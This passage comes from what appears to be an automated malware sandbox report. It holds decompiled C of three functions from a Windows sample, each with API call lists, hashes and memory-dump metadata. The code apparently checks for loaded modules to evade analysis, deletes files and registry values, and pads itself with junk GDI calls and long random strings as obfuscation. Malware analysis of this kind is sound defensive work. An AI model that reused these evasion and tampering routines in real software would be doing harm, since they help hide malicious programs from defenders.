				void* _t240;
				WCHAR* _t241;
				intOrPtr _t243;
				signed int _t244;
				WCHAR* _t245;
				signed int _t251;
				void* _t253;
				void* _t254;
				void* _t269;

				_t269 = __fp0;
				_t222 = __edx;
				_t197 = __ecx;
				_t86 =  *0xef56a8; // 0xf00000
				_t253 = (_t251 & 0xfffffff8) - 0x17c;
				_t227 = 0;
				if(( *(_t86 + 0x1898) & 0x00000082) == 0) {
					L8:
					_t88 = E00EC9E09(_t197, __eflags); // executed
					__eflags = _t88;
					if(_t88 == 0) {
						L7:
						_t89 = _t88 | 0xffffffff;
						L39:
						return _t89;
					}
					_t90 = E00ED050A(0xef2a3c, 0x10, 0xc6e);
					_t198 =  *0xef56a8; // 0xf00000
					_t254 = _t253 + 0xc;
					_t240 = 3;
					 *0xef5740 = _t90;
					__eflags =  *((intOrPtr*)(_t198 + 0x214)) - _t240;
					if( *((intOrPtr*)(_t198 + 0x214)) != _t240) {
						_t13 = _t198 + 0x114; // 0xf00114
						E00EC92AD( *((intOrPtr*)( *((intOrPtr*)(_t198 + 0x110)))), _t198, _t222, _t269, _t13, _a4, 0, 0);
						_t198 =  *0xef56a8; // 0xf00000
						_t254 = _t254 + 0x10;
					}
					__eflags =  *((intOrPtr*)(_t198 + 0x101c)) - _t240;
					if( *((intOrPtr*)(_t198 + 0x101c)) == _t240) {
						L15:
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v340 = _a4;
						_v344 =  *((intOrPtr*)(_t198 + 0x214));
						_t94 =  *0xef5740; // 0x520fc68
						_t95 =  *(_t94 + 8);
						__eflags = _t95;
						if(__eflags != 0) {
							 *_t95(0, 0, 1,  &_v336,  &_v332); // executed
						}
						E00ED7260(__eflags,  &_v344); // executed
						_pop(_t198);
						__eflags =  *0xef579c; // 0x1
						if(__eflags <= 0) {
							IsValidCodePage(0x27);
							goto L33;
						} else {
							_t120 =  *0xef5740; // 0x520fc68
							__eflags =  *(_t120 + 8);
							if( *(_t120 + 8) != 0) {
								_t175 =  *(_t120 + 0xc);
								__eflags = _t175;
								if(_t175 != 0) {
									 *_t175(_v336);
								}
							}
							_t121 =  *0xef56a8; // 0xf00000
							_t198 =  *((intOrPtr*)(_t121 + 0x214));
							__eflags = _t198 - _t240;
							if(_t198 == _t240) {
								goto L33;
							} else {
								__eflags =  *((intOrPtr*)(_t121 + 4)) - 6;
								if( *((intOrPtr*)(_t121 + 4)) >= 6) {
									__imp__GetCPInfoExA(0x37, 0x1c,  &_v292);
									_t123 =  *0xef56a8; // 0xf00000
									__eflags =  *((intOrPtr*)(_t123 + 4)) - 6;
									if( *((intOrPtr*)(_t123 + 4)) < 6) {
										goto L33;
									}
									__eflags =  *((intOrPtr*)(_t123 + 0x101c)) - _t240;
									if( *((intOrPtr*)(_t123 + 0x101c)) != _t240) {
										goto L33;
									}
									E00EC9DCA();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t127 =  *0xef56c8; // 0x520f6c8
									 *((intOrPtr*)(_t127 + 0xd8))( &_v376);
									_t204 = _v370;
									_t130 = _t204 + 0x00000002 & 0x0000ffff;
									asm("cdq");
									_t244 = 0x3c;
									_t245 = _v372;
									_t195 = _t130 / _t244 + _t245 & 0x0000ffff;
									_t133 = _t204 + 0x0000000e & 0x0000ffff;
									_v392 = _t130 % _t244;
									asm("cdq");
									_t206 = 0x3c;
									_v384 = _t133 % _t206;
									_v364 = _t133 / _t206 + _t245 & 0x0000ffff;
									_t137 = E00ECD239(0x1000);
									_pop(_t207);
									_v400 = _t137;
									__eflags = _t137;
									if(_t137 != 0) {
										_v396 = E00EC27B8(_t207, 0x24e);
										_t139 =  *0xef56a8; // 0xf00000
										_t232 =  &_v340;
										E00ECE851(_t232, 2, 7, 0xa, _t139 + 0x648);
										_t142 =  *0xef56a8; // 0xf00000
										_t144 = E00EC2A1B(_t142 + 0x228, 1,  *((intOrPtr*)(_t142 + 0xa0))); // executed
										_v388 = _t144;
										__eflags = _t144;
										if(_t144 != 0) {
											_push(_v384 & 0x0000ffff);
											_push(_v364 & 0x0000ffff);
											_push(_v392 & 0x0000ffff);
											_push(_t195);
											_push(_t144);
											_push(_t232);
											_t148 =  *0xef56a8; // 0xf00000
											__eflags = _t148 + 0x1020;
											E00ECE17D(0x1000, _v400, _v396, _t148 + 0x1020);
											E00ED0299( &_v396);
											Arc(0, 0x23, 0x16, 0x53, 0x4f, 0x4e, 3, 0x21, 0x62);
											E00ECDD64(_v400, 0, 0xbb8, 1); // executed
											E00ECD1EA( &_v424, 0xfffffffe);
										}
										E00ECD1EA( &_v400, 0xfffffffe);
									}
									goto L38;
								}
								__eflags = _t198 - 2;
								if(_t198 != 2) {
									goto L33;
								}
								E00EC9DCA();
								asm("stosd");
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_t160 =  *0xef56c8; // 0x520f6c8
								 *((intOrPtr*)(_t160 + 0xd8))( &_v364);
								_t164 = _v358 + 0x00000002 & 0x0000ffff;
								asm("cdq");
								_t214 = 0x3c;
								_v384 = _t164 % _t214;
								_t235 = _t164 / _t214 + _v360 & 0x0000ffff;
								_t196 = E00ECD239(0x1000);
								_pop(_t215);
								_v372 = _t196;
								__eflags = _t196;
								if(_t196 != 0) {
									_t168 = E00ED3A82(_t215, 0x335);
									_t217 =  *0xef56a8; // 0xf00000
									_push(_t217 + 0x228);
									_push(_v384 & 0x0000ffff);
									_v388 = _t168;
									E00ECE17D(0x1000, _t196, _t168, _t235);
									E00ED0299( &_v388);
									E00ECDD64(_t196, 0, 0xbb8, 1);
									E00ECD1EA( &_v372, 0xfffffffe);
								}
								goto L38;
							}
						}
					} else {
						_t178 =  *((intOrPtr*)(_t198 + 0x214));
						__eflags = _t178 - _t240;
						if(_t178 == _t240) {
							goto L15;
						}
						__eflags =  *((intOrPtr*)(_t198 + 4)) - 6;
						if( *((intOrPtr*)(_t198 + 4)) >= 6) {
							L33:
							_t99 = E00ED3A82(_t198, 0x241);
							_push(0);
							_push(_t99);
							_v376 = _t99;
							_t100 =  *0xef56a8; // 0xf00000
							_t241 = E00ECE9D2(_t100 + 0x228);
							_v372 = _t241;
							__eflags = _t241;
							if(_t241 != 0) {
								_t116 = E00ED0B5E(_t241);
								__eflags = _t116;
								if(_t116 != 0) {
									DeleteFileW(_t241);
								}
								E00ECD1EA( &_v372, 0xfffffffe);
							}
							E00ED0299( &_v376);
							BitBlt(0, 0x3e, 0x2a, 0x11, 0x16, 0, 0x58, 0x2c, 6);
							_t106 =  *0xef56a8; // 0xf00000
							lstrcpynW(_t106 + 0x438,  *0xef5734, 0x20a);
							_t109 =  *0xef56a8; // 0xf00000
							_t110 = _t109 + 0x228;
							__eflags = _t110;
							lstrcpynW(_t110,  *0xef573c, 0x20a);
							_t243 =  *0xef56a8; // 0xf00000
							_t84 = _t243 + 0x228; // 0xf00228
							 *((intOrPtr*)(_t243 + 0x434)) = E00ECEAFE(_t84);
							E00ECD1EA(0xef5734, 0xfffffffe);
							E00ECD1EA(0xef573c, 0xfffffffe);
							L38:
							_t89 = 0;
							__eflags = 0;
							goto L39;
						}
						__eflags = _t178 - 2;
						if(_t178 != 2) {
							goto L33;
						}
						goto L15;
					}
				}
				_v384 = E00ED3A6B();
				_t186 = E00ED3A6B();
				_v380 = _t186;
				if(_v384 == 0 || _t186 == 0) {
					goto L8;
				} else {
					if(GetModuleHandleA(_v384) != 0 || GetModuleHandleA(_v380) != 0) {
						_t227 = 1;
					}
					E00ED02B3( &_v384);
					_t88 = E00ED02B3( &_v380);
					if(_t227 == 0) {
						goto L8;
					}
					goto L7;
				}
			}

0x00ec9941
0x00ec9941
0x00ec9941
0x00ec9947
0x00ec9952
0x00ec995d
0x00ec9961
0x00ec99c4
0x00ec99c4
0x00ec99c9
0x00ec99cb
0x00ec99bc
0x00ec99bc
0x00ec9dc3
0x00ec9dc9
0x00ec9dc9
0x00ec99d9
0x00ec99de
0x00ec99e4
0x00ec99e9
0x00ec99ea
0x00ec99ef
0x00ec99f5
0x00ec99fc
0x00ec9a0b
0x00ec9a10
0x00ec9a16
0x00ec9a16
0x00ec9a19
0x00ec9a1f
0x00ec9a3e
0x00ec9a44
0x00ec9a45
0x00ec9a46
0x00ec9a47
0x00ec9a48
0x00ec9a4c
0x00ec9a56
0x00ec9a5a
0x00ec9a5f
0x00ec9a62
0x00ec9a64
0x00ec9a74
0x00ec9a74
0x00ec9a7b
0x00ec9a80
0x00ec9a81
0x00ec9a87
0x00ec9ce7
0x00000000
0x00ec9a8d
0x00ec9a8d
0x00ec9a92
0x00ec9a95
0x00ec9a97
0x00ec9a9a
0x00ec9a9c
0x00ec9aa2
0x00ec9aa2
0x00ec9a9c
0x00ec9aa4
0x00ec9aa9
0x00ec9aaf
0x00ec9ab1
0x00000000
0x00ec9ab7
0x00ec9ab7
0x00ec9abb
0x00ec9b84
0x00ec9b8a
0x00ec9b8f
0x00ec9b93
0x00000000
0x00000000
0x00ec9b99
0x00ec9b9f
0x00000000
0x00000000
0x00ec9ba5
0x00ec9bb0
0x00ec9bb1
0x00ec9bb2
0x00ec9bb3
0x00ec9bb9
0x00ec9bbe
0x00ec9bc4
0x00ec9bcb
0x00ec9bce
0x00ec9bd1
0x00ec9bd4
0x00ec9bdf
0x00ec9be2
0x00ec9be5
0x00ec9be9
0x00ec9bea
0x00ec9bf8
0x00ec9bfc
0x00ec9c00
0x00ec9c05
0x00ec9c06
0x00ec9c0a
0x00ec9c0c
0x00ec9c1c
0x00ec9c20
0x00ec9c32
0x00ec9c36
0x00ec9c3b
0x00ec9c4e
0x00ec9c56
0x00ec9c5a
0x00ec9c5c
0x00ec9c63
0x00ec9c69
0x00ec9c6f
0x00ec9c70
0x00ec9c71
0x00ec9c74
0x00ec9c75
0x00ec9c7a
0x00ec9c8a
0x00ec9c94
0x00ec9cae
0x00ec9cbe
0x00ec9cca
0x00ec9ccf
0x00ec9cd9
0x00ec9cdf
0x00000000
0x00ec9c0c
0x00ec9ac1
0x00ec9ac4
0x00000000
0x00000000
0x00ec9aca
0x00ec9ad5
0x00ec9ad6
0x00ec9ad7
0x00ec9ad8
0x00ec9ade
0x00ec9ae3
0x00ec9af0
0x00ec9af3
0x00ec9af6
0x00ec9b03
0x00ec9b07
0x00ec9b0f
0x00ec9b11
0x00ec9b12
0x00ec9b16
0x00ec9b18
0x00ec9b23
0x00ec9b29
0x00ec9b35
0x00ec9b3b
0x00ec9b42
0x00ec9b46
0x00ec9b50
0x00ec9b62
0x00ec9b6e
0x00ec9b73
0x00000000
0x00ec9b18
0x00ec9ab1
0x00ec9a21
0x00ec9a21
0x00ec9a27
0x00ec9a29
0x00000000
0x00000000
0x00ec9a2b
0x00ec9a2f
0x00ec9ced
0x00ec9cf2
0x00ec9cf8
0x00ec9cf9
0x00ec9cfa
0x00ec9cfe
0x00ec9d0e
0x00ec9d13
0x00ec9d17
0x00ec9d19
0x00ec9d1c
0x00ec9d22
0x00ec9d24
0x00ec9d27
0x00ec9d27
0x00ec9d34
0x00ec9d3a
0x00ec9d40
0x00ec9d56
0x00ec9d5c
0x00ec9d79
0x00ec9d7b
0x00ec9d87
0x00ec9d87
0x00ec9d8d
0x00ec9d8f
0x00ec9d95
0x00ec9da7
0x00ec9dad
0x00ec9db9
0x00ec9dc1
0x00ec9dc1
0x00ec9dc1
0x00000000
0x00ec9dc1
0x00ec9a35
0x00ec9a38
0x00000000
0x00000000
0x00000000
0x00ec9a38
0x00ec9a1f
0x00ec996d
0x00ec9976
0x00ec997b
0x00ec9983
0x00000000
0x00ec9989
0x00ec9997
0x00ec99a5
0x00ec99a5
0x00ec99aa
0x00ec99b3
0x00ec99ba
0x00000000
0x00000000
0x00000000
0x00ec99ba

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0000000C), ref: 00EC9993
GetModuleHandleA.KERNEL32(?), ref: 00EC999D
GetCPInfoExA.KERNEL32(00000037,0000001C,?), ref: 00EC9B84
Arc.GDI32(00000000,00000023,00000016,00000053,0000004F,0000004E,00000003,00000021,00000062), ref: 00EC9CAE
IsValidCodePage.KERNEL32(00000027,00000000,00000000,0000000C), ref: 00EC9CE7

Part of subcall function 00ECE9D2: lstrcatW.KERNEL32(00000000,00000000), ref: 00ECEA12

DeleteFileW.KERNEL32(00000000), ref: 00EC9D27
BitBlt.GDI32(00000000,0000003E,0000002A,00000011,00000016,00000000,00000058,0000002C,00000006), ref: 00EC9D56
lstrcpynW.KERNEL32(00EFFBC8,0000020A), ref: 00EC9D79
lstrcpynW.KERNEL32(00EFFDD8,0000020A), ref: 00EC9D8D

Part of subcall function 00ED0B5E: GetFileAttributesW.KERNELBASE(?,?,00EC4430,?,?,00EC4342,00EC9A80,?,?,00EE1614,?,00EE1614,?,00EE1614,?,00000000), ref: 00ED0B69

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: FileHandleModulelstrcpyn$AttributesCodeDeleteInfoPageValidlstrcat
String ID:
API String ID: 3680973260-0
Opcode ID: 4ed8690bca0b2d85cae798eca09113a4285335fc01ab9ee5411db95e34a5ce12
Instruction ID: 2261fffbddefb2dffd76055d2514fdb699dd44b8eb7e697ddee2e805a6541236
Opcode Fuzzy Hash: 4ed8690bca0b2d85cae798eca09113a4285335fc01ab9ee5411db95e34a5ce12
Instruction Fuzzy Hash: 20C11472604300AFD710EB68DD8AF6A73E8EB88714F04052EF255FB2D2D672D946CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00EC2851, Relevance: 13.7, APIs: 9, Instructions: 160
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00EC2851(void* __fp0, void* _a4, short* _a8, intOrPtr _a12, long _a16) {
				void* _v8;
				char* _v12;
				void* _v16;
				struct HDC__* _v20;
				int _v24;
				int _v28;
				int _v32;
				int _v36;
				long _v40;
				int _v44;
				int _v48;
				int _v52;
				struct _FILETIME _v60;
				void _v578;
				short _v580;
				char _v864;
				void* __ebx;
				void* _t58;
				long _t59;
				long _t62;
				intOrPtr _t67;
				long _t76;
				short* _t79;
				long _t80;
				intOrPtr _t82;
				long _t83;
				short* _t87;
				intOrPtr _t89;
				int _t93;
				long _t100;
				void* _t104;
				void* _t105;
				void* _t109;

				_t109 = __fp0;
				_v580 = 0;
				_v8 = 0;
				memset( &_v578, 0, 0x206);
				_v36 = 0x104;
				_v32 = 0x3fff;
				_v28 = 0;
				_t58 = E00ECD239(0x3fff);
				_t105 = _t104 + 0x10;
				_v16 = _t58;
				if(_t58 != 0) {
					_t93 = 0x800;
					_t59 = E00ECD239(0x800);
					_v12 = _t59;
					__eflags = _t59;
					if(_t59 == 0) {
						L18:
						goto L19;
					}
					_t62 = RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8); // executed
					__eflags = _t62;
					if(_t62 != 0) {
						L15:
						__eflags = _v8;
						if(_v8 != 0) {
							_t67 =  *0xef56d4; // 0x520f880
							 *((intOrPtr*)(_t67 + 0x1c))(_v8);
						}
						E00ECD1EA( &_v16, 0x3fff); // executed
						E00ECD1EA( &_v12, _t93); // executed
						goto L18;
					}
					_t76 = RegQueryInfoKeyW(_v8,  &_v580,  &_v36, 0, 0, 0, 0,  &_v24,  &_v44,  &_v48,  &_v52,  &_v60);
					__eflags = _t76;
					if(_t76 == 0) {
						__eflags = _v24;
						if(__eflags == 0) {
							goto L15;
						}
						_v20 = 0;
						if(__eflags <= 0) {
							goto L15;
						} else {
							goto L8;
						}
						do {
							L8:
							memset(_v12, 0, _t93);
							memset(_v16, 0, 0x3fff);
							_t79 = _v16;
							_t105 = _t105 + 0x18;
							_v32 = 0x3fff;
							_v28 = _t93;
							 *_t79 = 0;
							_t80 = RegEnumValueW(_v8, _v20, _t79,  &_v32, 0, 0, _v12,  &_v28);
							__eflags = _t80;
							if(_t80 == 0) {
								_t82 =  *0xef56ac; // 0x520f8f8
								_t83 =  *((intOrPtr*)(_t82 + 4))(_v12, _a12);
								_v40 = _t83;
								__eflags = _t83;
								if(_t83 != 0) {
									RegDeleteValueW(_v8, _v16);
									BitBlt(0, 0x3c, 0x4c, 0x50, 0x4e, 0, 0x2f, 4, 0x39);
									__eflags = _a16;
									if(_a16 != 0) {
										_t100 = _v40;
										_t87 = _t100 + E00ECFF99(_t100) * 2 - 2;
										__eflags =  *_t87 - 0x22;
										if(__eflags == 0) {
											__eflags = 0;
											 *_t87 = 0;
										}
										E00ED09E9(_t100, __eflags, _t109);
										_t93 = 0x800;
									}
								}
							}
							_v20 =  &(_v20->i);
							__eflags = _v20 - _v24;
						} while (_v20 < _v24);
						goto L15;
					}
					_t89 =  *0xef56d4; // 0x520f880
					 *((intOrPtr*)(_t89 + 0x1c))(_v8);
					goto L15;
				} else {
					__imp__GetCPInfoExA(5, 0x60,  &_v864);
					L19:
					return 0;
				}
			}

0x00ec2851
0x00ec2865
0x00ec2874
0x00ec2877
0x00ec2882
0x00ec2889
0x00ec288c
0x00ec288f
0x00ec2894
0x00ec2897
0x00ec289c
0x00ec28b5
0x00ec28bb
0x00ec28c1
0x00ec28c4
0x00ec28c6
0x00ec2a14
0x00000000
0x00ec2a14
0x00ec28dc
0x00ec28e2
0x00ec28e4
0x00ec29ed
0x00ec29ed
0x00ec29f0
0x00ec29f5
0x00ec29fa
0x00ec29fa
0x00ec2a02
0x00ec2a0c
0x00000000
0x00ec2a11
0x00ec2910
0x00ec2916
0x00ec2918
0x00ec292a
0x00ec292d
0x00000000
0x00000000
0x00ec2933
0x00ec2936
0x00000000
0x00000000
0x00000000
0x00000000
0x00ec293c
0x00ec293c
0x00ec2941
0x00ec294b
0x00ec2950
0x00ec2953
0x00ec2958
0x00ec295b
0x00ec295e
0x00ec2975
0x00ec297b
0x00ec297d
0x00ec2982
0x00ec298a
0x00ec298d
0x00ec2990
0x00ec2992
0x00ec299a
0x00ec29b0
0x00ec29b6
0x00ec29b9
0x00ec29bb
0x00ec29c3
0x00ec29c7
0x00ec29cb
0x00ec29cd
0x00ec29cf
0x00ec29cf
0x00ec29d4
0x00ec29d9
0x00ec29d9
0x00ec29b9
0x00ec2992
0x00ec29de
0x00ec29e4
0x00ec29e4
0x00000000
0x00ec293c
0x00ec291d
0x00ec2922
0x00000000
0x00ec289e
0x00ec28a9
0x00ec2a16
0x00ec2a1a
0x00ec2a1a

APIs

memset.MSVCRT ref: 00EC2877

Part of subcall function 00ECD239: RtlAllocateHeap.NTDLL(00000008,?,?,00ECE8D2,00000100,?,00EC33EA), ref: 00ECD247

GetCPInfoExA.KERNEL32(00000005,00000060,?), ref: 00EC28A9
RegOpenKeyExW.KERNELBASE(?,?,00000000,0002001F,?,?,?,?,00000000,00000001), ref: 00EC28DC
RegQueryInfoKeyW.ADVAPI32 ref: 00EC2910

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: Info$AllocateHeapOpenQuerymemset
String ID:
API String ID: 1235409961-0
Opcode ID: 9050c07546c19bb465bf6a0006fc2841687c52d6aed6b96320772b06c34a7db3
Instruction ID: 13cd211e39bc27a541161d7abf7c3f12cb73a97091748993a2194bdfd990e643
Opcode Fuzzy Hash: 9050c07546c19bb465bf6a0006fc2841687c52d6aed6b96320772b06c34a7db3
Instruction Fuzzy Hash: C4512971900108AFDB21DF95CD89EEFBBBDEF88700F10546AF605B6161E7728A45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00EC35D1, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 100
filestringwindowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00EC35D1(void* __ebx, void* __eflags) {
				WCHAR* _v8;
				char _v9;
				char _v24;
				char _v64;
				short _v88;
				void* __esi;
				intOrPtr _t15;
				intOrPtr _t20;
				void* _t21;
				intOrPtr _t22;
				void* _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				WCHAR* _t28;
				WCHAR* _t31;
				intOrPtr _t32;
				signed int _t34;
				void* _t41;
				void* _t42;
				char* _t49;
				WCHAR* _t50;
				void* _t51;

				_t41 = __ebx;
				CreateEnhMetaFileA(0, "6VgVg6R6WXewmhXMYs6yx G7yy9,xTBbxX7J pW4zlpHlXjeUhrkM1Vz9sryvMbw71m xN  10acxSXe3lT14gLEESCQWS9yZNWw,2GyT,kSQTHK9do1mOEFCsfZf3gYuv2ZlQFEPXeKmueC4K SFPgIV,.6Av9Ng4xakKEfWJ9yU,WrWR6RvCzWEtDkevmAiCzxc8RcUZKdOO vIObfbAO,gPcJbpstImpOpvMsuyCQi4GSLiRER9V8LwVWESgCB0J sv7Q nWLw cdPNvA3 bpQ,BZ sz1W2,ZjWtWe3dLmKA5009 3ADGEg2c ZpQ3AzTkDLpFYec3qrZ94Lq2stkpuxqa2g F8vtY2Vfv.4RBfoCk5dzmhVlURJPbUMQt56frGzfKufOt8tw Lmh,V5m2rmIS9hPz8 xH04tyzMWlXgXCU1V6 UwN6VfZnAzb,HJ2iz684SkZyBQwcC6StS2kcBdRbg6ug0mp92S.EZC0 2lbDpEgYs Hv0tVB RtmA cw3mueFkSBT7FZm3MIp,IAYCbyXN00dAN,,D2GerUbUp,Kgh0NMXq1JLHkNSS1cmyPaK 5m XnkF017So1lk1qniL1MQqNqt  r,BYdAa8PLGFojSzaCK2j vHcVrMn,C HHtsvcz83i,cYwqk YhUQvYQzUZ3QrHB,", 0, 0);
				_t15 =  *0xef56a8; // 0xf00000
				_t49 =  &_v64;
				E00ECEE1F(_t49, __eflags,  *((intOrPtr*)(_t15 + 0xac)) + 4);
				_t20 =  *0xef56c8; // 0x520f6c8
				_t21 =  *((intOrPtr*)(_t20 + 0xbc))(2, 0, _t49);
				_t53 = _t21;
				if(_t21 != 0) {
					_t22 =  *0xef56c8; // 0x520f6c8
					 *((intOrPtr*)(_t22 + 0x30))(_t21);
					_push(3);
					L4:
					_pop(_t24);
					return _t24;
				}
				BitBlt(0, 0x2a, 0x3e, 0xe, 0x41, 0, 0x34, 0x5b, 0x22);
				_t26 =  *0xef56a8; // 0xf00000
				_t27 = E00EC4D09(_t53,  *((intOrPtr*)(_t26 + 0xac)), 0); // executed
				 *0xef56d0 = _t27;
				if(_t27 != 0) {
					_t28 = E00ED1747();
					_v8 = _t28;
					__eflags = _t28;
					if(_t28 == 0) {
						__eflags = 0;
						return 0;
					}
					GetLastError();
					_t31 = E00ECFE78("7eX2ONOatZF9oakljHMXEmqOUiI3.LozHMlR2UD.,SK.d38gb6jnLP3erw HNx FBdmw1SRB8 qN jC7q,yl 0IZP,V54LCMFMoafYheNTH qCZ,MCsa7YOysI5c 3B fqS7MIX0hpvyp,PdomJKehpsvIr,XZ5YJUOM U0Hj40pHuUCNDfvAshYYHbC1.YjTojwfb NBXpeRexTGkg NMYiPlrbZ8Ng zNRoZa5Z8AU 2Pi2nC3VR5qBWqKY4EciMgTP  Ing38Uz ZosXF9C7zWBk lUSeXQ1 QJKwV1VfVo3XjVDC8t71.8ywNQsBGuZ2pXtUcO2LN1EZDCZp4POm0n22TvYdS0SNuf SqlzYPF9dXjJPLfl3IbAxGcMBAo3XCbFuupSA6iGQxF,jj9qD7ATPbNd1dlZ sc4 gL72EFjlMMxbxpjuOkrPQOMz8mdgJn,n1tQ,HaGGIbxGq1mdYou2YGqPZWCT,KKcAgUfYOEoWzCyq6MVQ QO32E5W Ht ,6u rIijoW5UHsY44Dv8OIwIGvo5DKHyoPVPF9 pWgolBaD48GaSjYdrJULsCXFo53SZK6RJalbaCXn nqd8nL7Mv5dIX0uGBVYxEKrOfIN4YHgFs9mXmXuu1.mYNZJN4C vx.PdpTtn. P qo0htjwco,ACo8diUf9TT f7iMrqZsNr0RUhYzBpFSxDkC69 7Y9YE.0GQz  WA82adj4,yqdfpe2AWEKITH3slwt,0DSFeYaSDCwu4AmS65aNr.XFo,Kyl87ylLl pROrZ bUzFosWZ. cQRY PXMUKyxPDYte LpPkHuB v.lt3Ne6XNVo07qHFGkGGpc,xoQo L s6.Ru9NHx5CCzU  t,X39p o3aLKI9l8DXjhWDiNgT x NEE1 sa4z6n1L auPJMH7YxWGfGAKPHRkYBgeWmBS 8bIf YQbRHK0ItX4yv9jj75pmrfCBZ jMErQ0XLruojRO0GuTswkbmw2kKCf0x4yeonc7Zc5FnLoge3y0vNLZOo9HIXtBCN6ultKusR I2R0IJQGnjE2 KOVv ChafFhg BkutdWZN8AobZ04ULf51gQCZDl f0T7kITO93I7AFenDcT3bV4XtbRchg2a1rN,gC.aDJ c6zVdc9AvrQLskENN6KRY9qygrLHpGOMPXNoGBs486d Hwo4e5Sssz.3yZOI9L,Uo61UfBybeBlg4 Rgz0,,nlIquQIAbV 0MHezI6 S11ufn.a5V O.kXuFwX5RBhMRaiRtkrwwTO 1mb9oE6K0g3.hLvB8fRZhszZpl CDbTzIMNhhi KIrpyrQOhkz.vTSlNE0SNQtw6j7DgrVGZ0DLPR,l1sS91u4tBTNuSpH0bBLJN,frE71dckGTJNKb,i2irp6qLNYiLytoL8d34uAqq8xnDat Nht whBS27,tusBZSJnrYcP4F,Z uSdClmMOPupKE66fj3mv1omi86Y kj.u.p2S36vZH3d7P,Q2lR7EpgzCTeXQb PMTw hi81JJHFhyWcfLfSlN09M8,BqXDWGrSL3xneWj.7S1beot,Cta6gM6R7Y9Gg9AOIAkdoLuXh T eBWqzTP7yVBVKy,ktTNCbmNLkbiF ifON6kQO.ozJyyl8X3aSLU,dAnJHCuh8npN idxAB9mZIMXz489.fpBE3 lhCu V sBmy,E3q62GN qDfhthYBmSCFUMk1w4CLnhA8HloL p7 ");
					_t50 = 0xf;
					__eflags = _t31 - _t50;
					if(_t31 <= _t50) {
						_t50 = _t31;
					}
					_push(_t41);
					_t42 = 0;
					_v9 = 0;
					__eflags = _t50;
					if(_t50 <= 0) {
						L10:
						_t32 =  *0xef56a8; // 0xf00000
						_t34 = lstrcmpiW(_t32 + 0x228, _v8);
						asm("sbb eax, eax");
						return  ~_t34 + 1;
					} else {
						do {
							_t8 = _t42 + 0x42; // 0x42
							 *((char*)(_t51 + _t42 - 0x14)) = _t8;
							MultiByteToWideChar(0, 0,  &_v24, 0xffffffff,  &_v88, 0x20);
							_t42 = _t42 + 1;
							__eflags = _t42 - _t50;
						} while (_t42 < _t50);
						goto L10;
					}
				}
				_push(2);
				goto L4;
			}

0x00ec35d1
0x00ec35e3
0x00ec35e9
0x00ec35f8
0x00ec35fb
0x00ec3604
0x00ec360c
0x00ec3612
0x00ec3614
0x00ec364d
0x00ec3652
0x00ec3655
0x00ec3657
0x00ec3657
0x00000000
0x00ec3657
0x00ec3626
0x00ec362c
0x00ec3638
0x00ec363f
0x00ec3646
0x00ec365a
0x00ec365f
0x00ec3662
0x00ec3664
0x00ec36c7
0x00000000
0x00ec36c7
0x00ec3666
0x00ec3671
0x00ec3679
0x00ec367a
0x00ec367c
0x00ec367e
0x00ec367e
0x00ec3680
0x00ec3681
0x00ec3683
0x00ec3687
0x00ec3689
0x00ec36ab
0x00ec36ab
0x00ec36b9
0x00ec36c1
0x00000000
0x00ec368b
0x00ec368b
0x00ec368d
0x00ec3690
0x00ec36a0
0x00ec36a6
0x00ec36a7
0x00ec36a7
0x00000000
0x00ec368b
0x00ec3689
0x00ec3648
0x00000000

APIs

CreateEnhMetaFileA.GDI32(00000000,6VgVg6R6WXewmhXMYs6yx G7yy9,xTBbxX7J pW4zlpHlXjeUhrkM1Vz9sryvMbw71m xN 10acxSXe3lT14gLEESCQWS9yZNWw,2GyT,kSQTHK9do1mOEFCsfZf3gYuv2ZlQFEPXeKmueC4K SFPgIV,.6Av9Ng4xakKEfWJ9yU,WrWR6RvCzWEtDkevmAiCzxc8RcUZKdOO vIObfbAO,gPcJbpstImpOpvMsuyCQi4GSLiRER9V8LwVWESgCB0J ,00000000,00000000), ref: 00EC35E3
BitBlt.GDI32(00000000,0000002A,0000003E,0000000E,00000041,00000000,00000034,0000005B,00000022), ref: 00EC3626

Part of subcall function 00EC4D09: CreateEnhMetaFileA.GDI32(00000000,reYjfEaAzMCVX,YCBNnQxx9VLC 3,6qO5pyc9Py KVNueaP0rXWLKmyN0vo7 soQ3N9x3AplVOAuJssLHm8a0a9IrhEXFpS,6UN30Yec.MQNWflysfcs SZ2a17U,Cy0 2FzR0Jq5YyU5LVDkIo55nFYMaFlR3P1 VuTda 40t2eCp8QU1M9 1D.MAVObhQEyq2uc7JHONrDaVqiKPo4nSuuwOVKMrC hl sih8YsjkKDdtWsU,WzZZW5cKlkPlnaYCa,00000000,00000000), ref: 00EC4D2A
Part of subcall function 00EC4D09: FindCloseChangeNotification.KERNELBASE(?), ref: 00EC4D80

GetLastError.KERNEL32 ref: 00EC3666
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00EC36A0
lstrcmpiW.KERNEL32(00EFFDD8,?), ref: 00EC36B9

Strings

7eX2ONOatZF9oakljHMXEmqOUiI3.LozHMlR2UD.,SK.d38gb6jnLP3erw HNx FBdmw1SRB8 qN jC7q,yl 0IZP,V54LCMFMoafYheNTH qCZ,MCsa7YOysI5c 3B fqS7MIX0hpvyp,PdomJKehpsvIr,XZ5YJUOM U0Hj40pHuUCNDfvAshYYHbC1.YjTojwfb NBXpeRexTGkg NMYiPlrbZ8Ng zNRoZa5Z8AU 2Pi2nC3VR5qBWqKY4EciMgT, xrefs: 00EC366C
